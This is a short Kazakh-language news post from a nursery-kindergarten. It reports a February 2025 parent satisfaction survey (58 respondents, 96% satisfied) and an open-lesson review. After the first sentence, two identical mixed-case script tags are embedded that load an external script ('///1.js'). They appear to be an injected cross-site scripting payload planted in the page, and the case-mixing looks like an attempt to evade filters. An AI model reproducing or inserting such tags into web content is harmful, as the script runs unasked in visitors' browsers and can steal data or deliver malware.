2025 жылғы 20-21 ақпан аралығында ортаңғы топтарда ата-аналар арасында «Алтын бесік» бөбекжайының тәрбие-білім беру жұмысына қанағаттанушылық» тақырыбында Google-форма арқылы сауалнама жүргізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.02.2025
Сауалнамаға 58 ата-ана қатысты. Алынған мәліметтер педагогикалық ұжымның күшті және әлсіз жақтарын анықтауға, сондай-ақ оны жақсарту мүмкіндіктерін қарастыруға мүмкіндік берді.
Ата-аналардың тәрбие-білім беру жұмысына қанағаттанушылығын анықтауға бағытталған сауалнама нәтижелері келесіні көрсетті: ата-аналардың 96%-ы көрсетілетін қызметтердің сапасына қанағаттанған, ал 4%-ы жауап беруге қиналды.
Осылайша, талдау нәтижелеріне сүйене отырып, ата-аналардың балабақша ұсынатын тәрбие-білім беру қызметтеріне қанағаттанушылық деңгейін оң деп бағалауға болады.
«Алтын бесік» бөбекжайында бастауыш және мектепке дейінгі білім беру ұйымдарының бірлестігі аясында ашық ұйымдастырылған іс-әрекеттердің қаралымы өтті.